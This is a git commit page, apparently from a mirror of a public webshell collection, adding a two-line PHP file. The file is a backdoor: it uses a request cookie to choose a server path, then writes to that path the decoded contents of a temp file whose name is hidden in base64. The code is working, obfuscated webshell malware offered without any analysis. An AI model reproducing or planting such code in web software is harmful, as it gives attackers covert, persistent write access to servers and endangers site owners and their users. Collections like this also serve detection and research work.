1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Create 20220213_04.php

This commit is contained in:
tennc
2022-02-13 22:33:58 +08:00
committed by GitHub
parent b9f06d9682
commit 9640d18e26

2
php/20220213_04.php Normal file
View File

@@ -0,0 +1,2 @@
<?php
if(@$_COOKIE['path'] != ""){file_put_contents($_COOKIE['path'], base64_decode(file_get_contents(base64_decode("L3RtcC90bXA0RTE1LnRtcA=="))));}